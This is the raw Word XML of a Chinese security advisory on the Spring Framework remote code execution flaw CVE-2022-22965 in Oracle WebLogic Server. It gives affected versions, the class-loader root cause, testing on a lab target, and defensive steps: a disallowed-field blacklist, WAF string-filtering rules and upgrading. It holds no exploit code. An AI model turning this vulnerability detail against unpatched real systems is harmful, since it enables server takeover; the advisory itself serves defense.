            <w:bookmarkEnd w:id="1"/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hint="default" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi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lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>远程代码执行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240" w:lineRule="auto"/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Spring Framework 5.3.X &lt; 5.3.18</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:spacing w:line="240" w:lineRule="auto"/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Spring Framework 5.2.X &lt; 5.2.20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https://www.oracle.com/security-alerts/cpujul2022.html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Oracle Fusion Middleware 的 Oracle WebLogic Server 中引用了第三方框架Spring Framework，在 JDK 9 及以上版本环境下，远程攻击者可利用该漏洞写入恶意代码，实现远程代码执行，成功利用此漏洞可导致 Oracle WebLogic Server 被接管。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该</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsi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漏洞</w:t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是在Java 9的环境下，引入了class.module.classLoader，导致了CVE-2010-1622漏洞补丁的绕过，JDK9中存在可以绕过黑名单禁用的类，导致了这个漏洞。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3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spacing w:line="48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"https://www.freebuf.com/articles/network/327546.html"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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>【干货】Spring远程命令执行漏洞（CVE-2022-22965）原理分析和思考 - FreeBuf网络安全行业门户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pStyle w:val="23"/>
              <w:spacing w:line="48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"https://mp.weixin.qq.com/s/QtFC71efccrSTutvRczhiQ"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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Spring Framework远程代码执行漏洞(CVE-2022-22965)风险提示 (qq.com)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本机搭建靶场</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>或春秋云境靶机测试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①</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在应用中全局搜索@InitBinder注解，看看方法体内是否调用dataBinder.setDisallowedFields方法，如果发现此代码片段的引入,则在原来的黑名单中，添加{“class.","Class.”,“.class.”,“.Class.”}。(注:如果此代码片段使用较多，需要每个地方都追加)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="48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在应用系统的项目包下新建以下全局类，并保证这个类被Spring 加载到(推荐在Controller所在的包中添加)。完成类添加后，需对项目进行重新编译打包和功能验证测试，并重新发布项目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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF等安全组件防护</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在WAF等网络防护设备上，根据实际部署业务的流量情况，实现对“class.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>”“Class.”“.class.”“.Class.”等字符串的规则过滤，并在部署过滤规则后，对业务运行情况进行测试，避免产生额外影响。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③</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>官方修复</w:t>
            </w:r>
          </w:p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 Spring Framework 官方已发布最新版本，建议受影响的用户及时更新升级到最新版本。链接如下：</w:t>
            </w:r>
          </w:p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https://github.com/spring-projects/spring-framework/tags</w:t>
            </w:r>
          </w:p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注：Spring Framework 5.3.18和Spring Framework 5.2.20是 Spring 官方提供的两个安全版本（截止至3月31日）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/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b/>
        <w:bCs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blL1DiwCAABW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黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="114300" distR="114300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4CA55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C4CA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0MTdmYTY2NGExYmRlNmIzN2E1ZTEyZDIxYTNmMDYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="05D969B9"/>
    <w:rsid w:val="00023E76"/>
    <w:rsid w:val="000A4895"/>
    <w:rsid w:val="001277A1"/>
    <w:rsid w:val="0013116B"/>
    <w:rsid w:val="001503F0"/>
    <w:rsid w:val="00192237"/>
    <w:rsid w:val="001B492D"/>
    <w:rsid w:val="001C66CC"/>
    <w:rsid w:val="001C77A4"/>
    <w:rsid w:val="00215411"/>
    <w:rsid w:val="0025116B"/>
    <w:rsid w:val="00314D29"/>
    <w:rsid w:val="00380909"/>
    <w:rsid w:val="003F0045"/>
    <w:rsid w:val="00435295"/>
    <w:rsid w:val="00475F3B"/>
    <w:rsid w:val="004953C9"/>
    <w:rsid w:val="004C741B"/>
    <w:rsid w:val="004F0203"/>
    <w:rsid w:val="00517E86"/>
    <w:rsid w:val="00560A25"/>
    <w:rsid w:val="00595F40"/>
    <w:rsid w:val="005A758B"/>
    <w:rsid w:val="005E78E8"/>
    <w:rsid w:val="00633FDD"/>
    <w:rsid w:val="006373B3"/>
    <w:rsid w:val="00645E2B"/>
    <w:rsid w:val="006953BC"/>
    <w:rsid w:val="006D31AA"/>
    <w:rsid w:val="006D45D9"/>
    <w:rsid w:val="007971BF"/>
    <w:rsid w:val="007974C6"/>
    <w:rsid w:val="007A0A0C"/>
    <w:rsid w:val="007C3F48"/>
    <w:rsid w:val="007F5DE3"/>
    <w:rsid w:val="00807DD6"/>
    <w:rsid w:val="00830326"/>
    <w:rsid w:val="008307A7"/>
    <w:rsid w:val="00837C7C"/>
    <w:rsid w:val="00853159"/>
    <w:rsid w:val="00862F19"/>
    <w:rsid w:val="0087043C"/>
    <w:rsid w:val="00881CB2"/>
    <w:rsid w:val="00882C1B"/>
    <w:rsid w:val="00886F98"/>
    <w:rsid w:val="0089602B"/>
    <w:rsid w:val="008D368A"/>
    <w:rsid w:val="008D5D8F"/>
    <w:rsid w:val="008D69B5"/>
    <w:rsid w:val="00A3240D"/>
    <w:rsid w:val="00A32A80"/>
    <w:rsid w:val="00A340D5"/>
    <w:rsid w:val="00A42329"/>
    <w:rsid w:val="00A7090E"/>
    <w:rsid w:val="00A72F07"/>
    <w:rsid w:val="00AC3FD9"/>
    <w:rsid w:val="00AE3DEA"/>
    <w:rsid w:val="00B03A01"/>
    <w:rsid w:val="00B46086"/>
    <w:rsid w:val="00B60DA3"/>
    <w:rsid w:val="00B6372C"/>
    <w:rsid w:val="00B96E57"/>
    <w:rsid w:val="00BB26C5"/>
    <w:rsid w:val="00BB77C7"/>
    <w:rsid w:val="00C86B82"/>
    <w:rsid w:val="00CC1A5E"/>
    <w:rsid w:val="00CE38AE"/>
    <w:rsid w:val="00D35FE7"/>
    <w:rsid w:val="00D56CC8"/>
    <w:rsid w:val="00DC7824"/>
    <w:rsid w:val="00E37F57"/>
    <w:rsid w:val="00E45051"/>
    <w:rsid w:val="00E97D13"/>
    <w:rsid w:val="00E97D68"/>
    <w:rsid w:val="00F03B96"/>
    <w:rsid w:val="00F078AF"/>
    <w:rsid w:val="00F24A7E"/>
    <w:rsid w:val="00F33EA6"/>
    <w:rsid w:val="00F57CCF"/>
    <w:rsid w:val="00F96C19"/>
    <w:rsid w:val="00FB5308"/>
    <w:rsid w:val="00FD119F"/>
    <w:rsid w:val="00FE071F"/>
    <w:rsid w:val="00FE57A7"/>
    <w:rsid w:val="02AF01BF"/>
    <w:rsid w:val="04842AA6"/>
    <w:rsid w:val="05D969B9"/>
    <w:rsid w:val="09CA347F"/>
    <w:rsid w:val="0A40121D"/>
    <w:rsid w:val="0D8419EE"/>
    <w:rsid w:val="113F5017"/>
    <w:rsid w:val="1F4575FA"/>
    <w:rsid w:val="237C2E6E"/>
    <w:rsid w:val="252424BD"/>
    <w:rsid w:val="2D566BAD"/>
    <w:rsid w:val="344416FF"/>
    <w:rsid w:val="37B74831"/>
    <w:rsid w:val="3EAE274A"/>
    <w:rsid w:val="413E5D8A"/>
    <w:rsid w:val="45306C87"/>
    <w:rsid w:val="4A9668FF"/>
    <w:rsid w:val="4CA9426A"/>
    <w:rsid w:val="4D5E093E"/>
    <w:rsid w:val="502305A5"/>
    <w:rsid w:val="562522C8"/>
    <w:rsid w:val="57176C51"/>
    <w:rsid w:val="587310CB"/>
    <w:rsid w:val="5D652628"/>
    <w:rsid w:val="60536729"/>
    <w:rsid w:val="6C814395"/>
    <w:rsid w:val="6CA850CC"/>
    <w:rsid w:val="6E7A0512"/>
    <w:rsid w:val="6F871FE7"/>
    <w:rsid w:val="71305E2E"/>
    <w:rsid w:val="72320FFF"/>
    <w:rsid w:val="72FE5900"/>
    <w:rsid w:val="73DB7C0F"/>
    <w:rsid w:val="743A35AD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100" w:beforeLines="100" w:after="100" w:afterLines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Indent 2"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:ind w:firstLine="480" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="00000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  <w:rPr>
      <w:b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oc 9"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="1680"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13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4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WPSOffice手动目录 1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character" w:customStyle="1" w:styleId="24">
    <w:name w:val="label"/>
    <w:basedOn w:val="16"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="25">
    <w:name w:val="HTML 预设格式 字符"/>
    <w:basedOn w:val="16"/>
    <w:link w:val="13"/>
    <w:semiHidden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A3E4B-40AD-40F8-A551-80ACD5B2E0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1820</Words>
  <Characters>5324</Characters>
  <Lines>65</Lines>
  <Paragraphs>18</Paragraphs>
  <TotalTime>19</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6594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2022-07-21T12:30:00Z</dcterms:created>
  <dc:creator>复活少年</dc:creator>
  <cp:lastModifiedBy>微信用户</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-20T11:01:16Z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4E04D90BDADE4BE3AC5B90AFE570D23A_13</vt:lpwstr>
  </property>
</Properties>
</file>